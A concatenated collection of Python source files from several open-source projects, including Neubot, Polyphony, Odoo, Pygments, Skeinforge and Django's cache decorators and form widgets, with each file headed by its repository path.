def collect_legacy(self, stream, request_body, request):
''' Legacy interface to collect that also receives the
request object: speedtest needs to inspect the Authorization
header when the connecting client is pretty old '''
return self.collect(stream, request_body)
# The minimal unchoke returns the stream unique identifier only
def unchoke(self, stream, request_body):
''' Invoked when a stream is authorized to take the test '''
return { 'authorization': str(hash(stream)) }
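# A minimal sketch (hypothetical module, not part of Neubot): a test module
# overrides only the hooks it needs and inherits the defaults above.
class DemoEchoModule(NegotiateServerModule):
    ''' Example module that tags its authorization tokens '''
    def unchoke(self, stream, request_body):
        # Prefix the identifier so demo streams are easy to spot in logs.
        return {'authorization': 'demo-%s' % hash(stream)}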
|
ktok07b6/polyphony
|
refs/heads/master
|
tests/module/nesting01.py
|
1
|
from polyphony import module
from polyphony import testbench
from polyphony import is_worker_running
from polyphony.io import Port
from polyphony.typing import int8
from polyphony.timing import clksleep
@module
class Submodule:
def __init__(self, param):
self.i = Port(int8, 'in')
self.o = Port(int8, 'out')
self.param = param
@module
class Nesting01:
def __init__(self):
self.sub1 = Submodule(2)
self.sub2 = Submodule(3)
self.append_worker(self.worker, self.sub1)
self.append_worker(self.worker, self.sub2)
def worker(self, sub):
while is_worker_running():
v = sub.i.rd() * sub.param
sub.o.wr(v)
@testbench
def test(m):
m.sub1.i.wr(10)
m.sub2.i.wr(20)
clksleep(10)
assert m.sub1.o.rd() == 20
assert m.sub2.o.rd() == 60
m = Nesting01()
test(m)
|
ehirt/odoo
|
refs/heads/8.0
|
addons/mrp_repair/wizard/cancel_repair.py
|
384
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
lucychambers/lucychambers.github.io
|
refs/heads/master
|
.bundle/ruby/2.0.0/gems/pygments.rb-0.6.0/vendor/pygments-main/tests/test_latex_formatter.py
|
32
|
# -*- coding: utf-8 -*-
"""
Pygments LaTeX formatter tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
import os
import unittest
import tempfile
from pygments.formatters import LatexFormatter
from pygments.lexers import PythonLexer
import support
TESTFILE, TESTDIR = support.location(__file__)
class LatexFormatterTest(unittest.TestCase):
def test_valid_output(self):
fp = open(TESTFILE)
try:
tokensource = list(PythonLexer().get_tokens(fp.read()))
finally:
fp.close()
fmt = LatexFormatter(full=True, encoding='latin1')
handle, pathname = tempfile.mkstemp('.tex')
# place all output files in /tmp too
old_wd = os.getcwd()
os.chdir(os.path.dirname(pathname))
tfile = os.fdopen(handle, 'wb')
fmt.format(tokensource, tfile)
tfile.close()
try:
import subprocess
po = subprocess.Popen(['latex', '-interaction=nonstopmode',
pathname], stdout=subprocess.PIPE)
ret = po.wait()
output = po.stdout.read()
po.stdout.close()
except OSError:
# latex not available
pass
else:
if ret:
print(output)
self.assertFalse(ret, 'latex run reported errors')
os.unlink(pathname)
os.chdir(old_wd)
|
Avinash-Raj/appengine-django-skeleton
|
refs/heads/master
|
lib/django/views/decorators/cache.py
|
586
|
from functools import wraps
from django.middleware.cache import CacheMiddleware
from django.utils.cache import add_never_cache_headers, patch_cache_control
from django.utils.decorators import (
available_attrs, decorator_from_middleware_with_args,
)
def cache_page(*args, **kwargs):
"""
Decorator for views that tries getting the page from the cache and
populates the cache if the page isn't in the cache yet.
The cache is keyed by the URL and some data from the headers.
Additionally there is the key prefix that is used to distinguish different
cache areas in a multi-site setup. You could use the
get_current_site().domain, for example, as that is unique across a Django
project.
Additionally, all headers from the response's Vary header will be taken
into account on caching -- just like the middleware does.
"""
# We also check the arguments explicitly, to give better error messages in
# case people are using other ways to call cache_page that no longer work.
if len(args) != 1 or callable(args[0]):
raise TypeError("cache_page has a single mandatory positional argument: timeout")
cache_timeout = args[0]
cache_alias = kwargs.pop('cache', None)
key_prefix = kwargs.pop('key_prefix', None)
if kwargs:
raise TypeError("cache_page has two optional keyword arguments: cache and key_prefix")
return decorator_from_middleware_with_args(CacheMiddleware)(
cache_timeout=cache_timeout, cache_alias=cache_alias, key_prefix=key_prefix
)
def cache_control(**kwargs):
def _cache_controller(viewfunc):
@wraps(viewfunc, assigned=available_attrs(viewfunc))
def _cache_controlled(request, *args, **kw):
response = viewfunc(request, *args, **kw)
patch_cache_control(response, **kwargs)
return response
return _cache_controlled
return _cache_controller
def never_cache(view_func):
"""
Decorator that adds headers to a response so that it will
never be cached.
"""
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view_func(request, *args, **kwargs):
response = view_func(request, *args, **kwargs)
add_never_cache_headers(response)
return response
return _wrapped_view_func
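# A minimal sketch (hypothetical view, not part of this module) of how the
# decorators above compose: cache_page caches the rendered page for 15
# minutes while cache_control shapes the Cache-Control header.
def _demo_view():
    from django.http import HttpResponse

    @cache_page(60 * 15, key_prefix='site1')
    @cache_control(public=True, max_age=3600)
    def my_view(request):
        return HttpResponse('ok')
    return my_view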
|
makerbot/ReplicatorG
|
refs/heads/master
|
skein_engines/skeinforge-35/skeinforge_application/skeinforge_plugins/profile_plugins/winding.py
|
6
|
"""
This page is in the table of contents.
Winding is a script to set the winding profile for the skeinforge chain.
The displayed craft sequence is the sequence in which the tools craft the model and export the output.
On the winding dialog, clicking the 'Add Profile' button will duplicate the selected profile and give it the name in the input field. For example, if laser is selected and the name laser_10mm is in the input field, clicking the 'Add Profile' button will duplicate laser and save it as laser_10mm. The 'Delete Profile' button deletes the selected profile.
The profile selection is the setting. If you hit 'Save and Close' the selection will be saved; if you hit 'Cancel' it will not be. However, adding or deleting a profile is a permanent action; for example, 'Cancel' will not bring back any deleted profiles.
To change the winding profile, in a shell in the profile_plugins folder type:
> python winding.py
An example of using winding from the python interpreter follows below.
> python
Python 2.5.1 (r251:54863, Sep 22 2007, 01:43:31)
[GCC 4.2.1 (SUSE Linux)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import winding
>>> winding.main()
This brings up the winding setting dialog.
"""
from __future__ import absolute_import
import __init__
from fabmetheus_utilities import settings
from skeinforge_application.skeinforge_utilities import skeinforge_profile
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GPL 3.0'
def getCraftSequence():
"Get the winding craft sequence."
return 'cleave,preface,coil,flow,feed,home,lash,fillet,limit,dimension,unpause,export'.split(',')
def getNewRepository():
"Get the repository constructor."
return WindingRepository()
class WindingRepository:
"A class to handle the winding settings."
def __init__(self):
"Set the default settings, execute title & settings fileName."
skeinforge_profile.addListsSetCraftProfile( getCraftSequence(), 'free_wire', self, 'skeinforge_plugins.profile_plugins.winding.html')
def main():
"Display the export dialog."
if len(sys.argv) > 1:
writeOutput(' '.join(sys.argv[1 :]))
else:
settings.startMainLoopFromConstructor( getNewRepository() )
if __name__ == "__main__":
main()
|
dex4er/django
|
refs/heads/1.6.x
|
tests/urlpatterns_reverse/erroneous_views_module.py
|
157
|
import non_existent
def erroneous_view(request):
pass
|
jdelight/django
|
refs/heads/master
|
django/forms/widgets.py
|
18
|
"""
HTML Widget classes
"""
from __future__ import unicode_literals
import copy
import datetime
import re
from itertools import chain
from django.conf import settings
from django.forms.utils import flatatt, to_current_timezone
from django.utils import datetime_safe, formats, six
from django.utils.datastructures import MultiValueDict
from django.utils.dates import MONTHS
from django.utils.encoding import (
force_str, force_text, python_2_unicode_compatible,
)
from django.utils.formats import get_format
from django.utils.html import conditional_escape, format_html, html_safe
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.translation import ugettext_lazy
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'NumberInput',
'EmailInput', 'URLInput', 'PasswordInput', 'HiddenInput',
'MultipleHiddenInput', 'FileInput', 'ClearableFileInput', 'Textarea',
'DateInput', 'DateTimeInput', 'TimeInput', 'CheckboxInput', 'Select',
'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget',
'SplitHiddenDateTimeWidget', 'SelectDateWidget',
)
MEDIA_TYPES = ('css', 'js')
@html_safe
@python_2_unicode_compatible
class Media(object):
def __init__(self, media=None, **kwargs):
if media:
media_attrs = media.__dict__
else:
media_attrs = kwargs
self._css = {}
self._js = []
for name in MEDIA_TYPES:
getattr(self, 'add_' + name)(media_attrs.get(name))
def __str__(self):
return self.render()
def render(self):
return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES])))
def render_js(self):
return [
format_html(
'<script type="text/javascript" src="{}"></script>',
self.absolute_path(path)
) for path in self._js
]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css.keys())
return chain(*[[
format_html(
'<link href="{}" type="text/css" media="{}" rel="stylesheet" />',
self.absolute_path(path), medium
) for path in self._css[medium]
] for medium in media])
def absolute_path(self, path, prefix=None):
if path.startswith(('http://', 'https://', '/')):
return path
if prefix is None:
if settings.STATIC_URL is None:
# backwards compatibility
prefix = settings.MEDIA_URL
else:
prefix = settings.STATIC_URL
return urljoin(prefix, path)
def __getitem__(self, name):
"Returns a Media object that only contains media of the given type"
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
def add_js(self, data):
if data:
for path in data:
if path not in self._js:
self._js.append(path)
def add_css(self, data):
if data:
for medium, paths in data.items():
for path in paths:
if not self._css.get(medium) or path not in self._css[medium]:
self._css.setdefault(medium, []).append(path)
def __add__(self, other):
combined = Media()
for name in MEDIA_TYPES:
getattr(combined, 'add_' + name)(getattr(self, '_' + name, None))
getattr(combined, 'add_' + name)(getattr(other, '_' + name, None))
return combined
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend is True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
else:
return Media(definition)
else:
return base
return property(_media)
class MediaDefiningClass(type):
"""
Metaclass for classes that can have media definitions.
"""
def __new__(mcs, name, bases, attrs):
new_class = (super(MediaDefiningClass, mcs)
.__new__(mcs, name, bases, attrs))
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
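# A minimal sketch (hypothetical widget, not part of this module): asset
# declarations go on an inner Media class, and media_property merges the
# definitions of every ancestor into a single Media object.
class _DemoCalendarWidget(six.with_metaclass(MediaDefiningClass)):
    class Media:
        css = {'all': ('pretty.css',)}
        js = ('animations.js', 'actions.js')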
@html_safe
@python_2_unicode_compatible
class SubWidget(object):
"""
Some widgets are made of multiple HTML elements -- namely, RadioSelect.
This is a class that represents the "inner" HTML element of a widget.
"""
def __init__(self, parent_widget, name, value, attrs, choices):
self.parent_widget = parent_widget
self.name, self.value = name, value
self.attrs, self.choices = attrs, choices
def __str__(self):
args = [self.name, self.value, self.attrs]
if self.choices:
args.append(self.choices)
return self.parent_widget.render(*args)
class Widget(six.with_metaclass(MediaDefiningClass)):
needs_multipart_form = False # Determines whether this widget needs a multipart form
is_localized = False
is_required = False
supports_microseconds = True
def __init__(self, attrs=None):
if attrs is not None:
self.attrs = attrs.copy()
else:
self.attrs = {}
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
@property
def is_hidden(self):
return self.input_type == 'hidden' if hasattr(self, 'input_type') else False
def subwidgets(self, name, value, attrs=None, choices=()):
"""
Yields all "subwidgets" of this widget. Used only by RadioSelect to
allow template access to individual <input type="radio"> buttons.
Arguments are the same as for render().
"""
yield SubWidget(self, name, value, attrs, choices)
def render(self, name, value, attrs=None):
"""
Returns this Widget rendered as HTML, as a Unicode string.
The 'value' given is not guaranteed to be valid input, so subclass
implementations should program defensively.
"""
raise NotImplementedError('subclasses of Widget must provide a render() method')
def build_attrs(self, extra_attrs=None, **kwargs):
"Helper function for building an attribute dictionary."
attrs = dict(self.attrs, **kwargs)
if extra_attrs:
attrs.update(extra_attrs)
return attrs
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, returns the value
of this widget. Returns None if it's not provided.
"""
return data.get(name)
def id_for_label(self, id_):
"""
Returns the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Returns None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
class Input(Widget):
"""
Base class for all <input> widgets (except type='checkbox' and
type='radio', which are special).
"""
input_type = None # Subclasses must define this.
def _format_value(self, value):
if self.is_localized:
return formats.localize_input(value)
return value
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(self._format_value(value))
return format_html('<input{} />', flatatt(final_attrs))
class TextInput(Input):
input_type = 'text'
def __init__(self, attrs=None):
if attrs is not None:
self.input_type = attrs.pop('type', self.input_type)
super(TextInput, self).__init__(attrs)
class NumberInput(TextInput):
input_type = 'number'
class EmailInput(TextInput):
input_type = 'email'
class URLInput(TextInput):
input_type = 'url'
class PasswordInput(TextInput):
input_type = 'password'
def __init__(self, attrs=None, render_value=False):
super(PasswordInput, self).__init__(attrs)
self.render_value = render_value
def render(self, name, value, attrs=None):
if not self.render_value:
value = None
return super(PasswordInput, self).render(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
class MultipleHiddenInput(HiddenInput):
"""
A widget that handles <input type="hidden"> for fields that have a list
of values.
"""
def __init__(self, attrs=None, choices=()):
super(MultipleHiddenInput, self).__init__(attrs)
# choices can be any iterable
self.choices = choices
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = []
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
id_ = final_attrs.get('id')
inputs = []
for i, v in enumerate(value):
input_attrs = dict(value=force_text(v), **final_attrs)
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
input_attrs['id'] = '%s_%s' % (id_, i)
inputs.append(format_html('<input{} />', flatatt(input_attrs)))
return mark_safe('\n'.join(inputs))
def value_from_datadict(self, data, files, name):
if isinstance(data, MultiValueDict):
return data.getlist(name)
return data.get(name)
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
def render(self, name, value, attrs=None):
return super(FileInput, self).render(name, None, attrs=attrs)
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name)
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
initial_text = ugettext_lazy('Currently')
input_text = ugettext_lazy('Change')
clear_checkbox_label = ugettext_lazy('Clear')
template_with_initial = (
'%(initial_text)s: <a href="%(initial_url)s">%(initial)s</a> '
'%(clear_template)s<br />%(input_text)s: %(input)s'
)
template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def is_initial(self, value):
"""
Return whether value is considered to be an initial value.
"""
# hasattr() masks exceptions on Python 2.
if six.PY2:
try:
getattr(value, 'url')
except AttributeError:
return False
else:
return bool(value)
return bool(value and hasattr(value, 'url'))
def get_template_substitution_values(self, value):
"""
Return value-related substitutions.
"""
return {
'initial': conditional_escape(value),
'initial_url': conditional_escape(value.url),
}
def render(self, name, value, attrs=None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = '%(input)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
if self.is_initial(value):
template = self.template_with_initial
substitutions.update(self.get_template_substitution_values(value))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
class Textarea(Widget):
def __init__(self, attrs=None):
# Use slightly better defaults than HTML's 20x2 box
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super(Textarea, self).__init__(default_attrs)
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, name=name)
return format_html('<textarea{}>\r\n{}</textarea>',
flatatt(final_attrs),
force_text(value))
class DateTimeBaseInput(TextInput):
format_key = ''
supports_microseconds = False
def __init__(self, attrs=None, format=None):
super(DateTimeBaseInput, self).__init__(attrs)
self.format = format if format else None
def _format_value(self, value):
return formats.localize_input(value,
self.format or formats.get_format(self.format_key)[0])
class DateInput(DateTimeBaseInput):
format_key = 'DATE_INPUT_FORMATS'
class DateTimeInput(DateTimeBaseInput):
format_key = 'DATETIME_INPUT_FORMATS'
class TimeInput(DateTimeBaseInput):
format_key = 'TIME_INPUT_FORMATS'
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Widget):
def __init__(self, attrs=None, check_test=None):
super(CheckboxInput, self).__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def render(self, name, value, attrs=None):
final_attrs = self.build_attrs(attrs, type='checkbox', name=name)
if self.check_test(value):
final_attrs['checked'] = 'checked'
if not (value is True or value is False or value is None or value == ''):
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(value)
return format_html('<input{} />', flatatt(final_attrs))
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, six.string_types):
value = values.get(value.lower(), value)
return bool(value)
class Select(Widget):
allow_multiple_selected = False
def __init__(self, attrs=None, choices=()):
super(Select, self).__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select{}>', flatatt(final_attrs))]
options = self.render_options(choices, [value])
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def render_option(self, selected_choices, option_value, option_label):
if option_value is None:
option_value = ''
option_value = force_text(option_value)
if option_value in selected_choices:
selected_html = mark_safe(' selected="selected"')
if not self.allow_multiple_selected:
# Only allow for a single selection.
selected_choices.remove(option_value)
else:
selected_html = ''
return format_html('<option value="{}"{}>{}</option>',
option_value,
selected_html,
force_text(option_label))
def render_options(self, choices, selected_choices):
# Normalize to strings.
selected_choices = set(force_text(v) for v in selected_choices)
output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
output.append(format_html('<optgroup label="{}">', force_text(option_value)))
for option in option_label:
output.append(self.render_option(selected_choices, *option))
output.append('</optgroup>')
else:
output.append(self.render_option(selected_choices, option_value, option_label))
return '\n'.join(output)
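# A minimal sketch (not part of this module): nesting a list of
# (value, label) pairs under a group label makes render_options emit an
# <optgroup> around the inner options.
def _demo_grouped_select():
    # 'audio' becomes <optgroup label="audio"> wrapping two <option>s.
    return Select(choices=[('audio', [('mp3', 'MP3'), ('ogg', 'OGG')])])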
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (('1', ugettext_lazy('Unknown')),
('2', ugettext_lazy('Yes')),
('3', ugettext_lazy('No')))
super(NullBooleanSelect, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
try:
value = {True: '2', False: '3', '2': '2', '3': '3'}[value]
except KeyError:
value = '1'
return super(NullBooleanSelect, self).render(name, value, attrs, choices)
def value_from_datadict(self, data, files, name):
value = data.get(name)
return {'2': True,
True: True,
'True': True,
'3': False,
'False': False,
False: False}.get(value)
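# Round-trip sketch: render(value=True) marks choice '2' ("Yes") as selected,
# and a submitted '2' maps back to True in value_from_datadict; any value not
# in the mapping (e.g. '1', "Unknown") falls through to None via dict.get().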
class SelectMultiple(Select):
allow_multiple_selected = True
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = []
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select multiple="multiple"{}>', flatatt(final_attrs))]
options = self.render_options(choices, value)
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def value_from_datadict(self, data, files, name):
if isinstance(data, MultiValueDict):
return data.getlist(name)
return data.get(name)
@html_safe
@python_2_unicode_compatible
class ChoiceInput(SubWidget):
"""
An object used by ChoiceFieldRenderer that represents a single
<input type='$input_type'>.
"""
input_type = None # Subclasses must define this
def __init__(self, name, value, attrs, choice, index):
self.name = name
self.value = value
self.attrs = attrs
self.choice_value = force_text(choice[0])
self.choice_label = force_text(choice[1])
self.index = index
if 'id' in self.attrs:
self.attrs['id'] += "_%d" % self.index
def __str__(self):
return self.render()
def render(self, name=None, value=None, attrs=None, choices=()):
if self.id_for_label:
label_for = format_html(' for="{}"', self.id_for_label)
else:
label_for = ''
attrs = dict(self.attrs, **attrs) if attrs else self.attrs
return format_html(
'<label{}>{} {}</label>', label_for, self.tag(attrs), self.choice_label
)
def is_checked(self):
return self.value == self.choice_value
def tag(self, attrs=None):
attrs = attrs or self.attrs
final_attrs = dict(attrs, type=self.input_type, name=self.name, value=self.choice_value)
if self.is_checked():
final_attrs['checked'] = 'checked'
return format_html('<input{} />', flatatt(final_attrs))
@property
def id_for_label(self):
return self.attrs.get('id', '')
class RadioChoiceInput(ChoiceInput):
input_type = 'radio'
def __init__(self, *args, **kwargs):
super(RadioChoiceInput, self).__init__(*args, **kwargs)
self.value = force_text(self.value)
class CheckboxChoiceInput(ChoiceInput):
input_type = 'checkbox'
def __init__(self, *args, **kwargs):
super(CheckboxChoiceInput, self).__init__(*args, **kwargs)
self.value = set(force_text(v) for v in self.value)
def is_checked(self):
return self.choice_value in self.value
@html_safe
@python_2_unicode_compatible
class ChoiceFieldRenderer(object):
"""
An object used by RadioSelect to enable customization of radio widgets.
"""
choice_input_class = None
outer_html = '<ul{id_attr}>{content}</ul>'
inner_html = '<li>{choice_value}{sub_widgets}</li>'
def __init__(self, name, value, attrs, choices):
self.name = name
self.value = value
self.attrs = attrs
self.choices = choices
def __getitem__(self, idx):
choice = self.choices[idx] # Let the IndexError propagate
return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx)
def __str__(self):
return self.render()
def render(self):
"""
Outputs a <ul> for this set of choice fields.
If an id was given to the field, it is applied to the <ul> (each
item in the list will get an id of `$id_$i`).
"""
id_ = self.attrs.get('id')
output = []
for i, choice in enumerate(self.choices):
choice_value, choice_label = choice
if isinstance(choice_label, (tuple, list)):
attrs_plus = self.attrs.copy()
if id_:
attrs_plus['id'] += '_{}'.format(i)
sub_ul_renderer = self.__class__(
name=self.name,
value=self.value,
attrs=attrs_plus,
choices=choice_label,
)
sub_ul_renderer.choice_input_class = self.choice_input_class
output.append(format_html(self.inner_html, choice_value=choice_value,
sub_widgets=sub_ul_renderer.render()))
else:
w = self.choice_input_class(self.name, self.value,
self.attrs.copy(), choice, i)
output.append(format_html(self.inner_html,
choice_value=force_text(w), sub_widgets=''))
return format_html(self.outer_html,
id_attr=format_html(' id="{}"', id_) if id_ else '',
content=mark_safe('\n'.join(output)))
class RadioFieldRenderer(ChoiceFieldRenderer):
choice_input_class = RadioChoiceInput
class CheckboxFieldRenderer(ChoiceFieldRenderer):
choice_input_class = CheckboxChoiceInput
class RendererMixin(object):
renderer = None # subclasses must define this
_empty_value = None
def __init__(self, *args, **kwargs):
# Override the default renderer if we were passed one.
renderer = kwargs.pop('renderer', None)
if renderer:
self.renderer = renderer
super(RendererMixin, self).__init__(*args, **kwargs)
def subwidgets(self, name, value, attrs=None, choices=()):
for widget in self.get_renderer(name, value, attrs, choices):
yield widget
def get_renderer(self, name, value, attrs=None, choices=()):
"""Returns an instance of the renderer."""
if value is None:
value = self._empty_value
final_attrs = self.build_attrs(attrs)
choices = list(chain(self.choices, choices))
return self.renderer(name, value, final_attrs, choices)
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices).render()
def id_for_label(self, id_):
# Widgets using this RendererMixin are made of a collection of
# subwidgets, each with their own <label>, and distinct ID.
# The IDs are made distinct by a "_X" suffix, where X is the zero-based
# index of the choice field. Thus, the label for the main widget should
# reference the first subwidget, hence the "_0" suffix.
if id_:
id_ += '_0'
return id_
class RadioSelect(RendererMixin, Select):
renderer = RadioFieldRenderer
_empty_value = ''
class CheckboxSelectMultiple(RendererMixin, SelectMultiple):
renderer = CheckboxFieldRenderer
_empty_value = []
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
Its render() method is different than other widgets', because it has to
figure out how to split a single value for display in multiple widgets.
The ``value`` argument can be one of two things:
* A list.
* A normal value (e.g., a string) that has been "compressed" from
a list of values.
In the second case -- i.e., if the value is NOT a list -- render() will
first "decompress" the value into a list before rendering it. It does so by
calling the decompress() method, which MultiWidget subclasses must
implement. This method takes a single "compressed" value and returns a
list.
When render() does its HTML rendering, each value in the list is rendered
with the corresponding widget -- the first value is rendered in the first
widget, the second value is rendered in the second widget, etc.
Subclasses may implement format_output(), which takes the list of rendered
widgets and returns a string of HTML that formats them any way you'd like.
You'll probably want to use this class with MultiValueField.
"""
def __init__(self, widgets, attrs=None):
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super(MultiWidget, self).__init__(attrs)
@property
def is_hidden(self):
return all(w.is_hidden for w in self.widgets)
def render(self, name, value, attrs=None):
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
output = []
final_attrs = self.build_attrs(attrs)
id_ = final_attrs.get('id')
for i, widget in enumerate(self.widgets):
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
final_attrs = dict(final_attrs, id='%s_%s' % (id_, i))
output.append(widget.render(name + '_%s' % i, widget_value, final_attrs))
return mark_safe(self.format_output(output))
def id_for_label(self, id_):
# See the comment for RadioSelect.id_for_label()
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)]
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), returns a Unicode string
representing the HTML for the whole lot.
This hook allows you to format the HTML design of the widgets, if
needed.
"""
return ''.join(rendered_widgets)
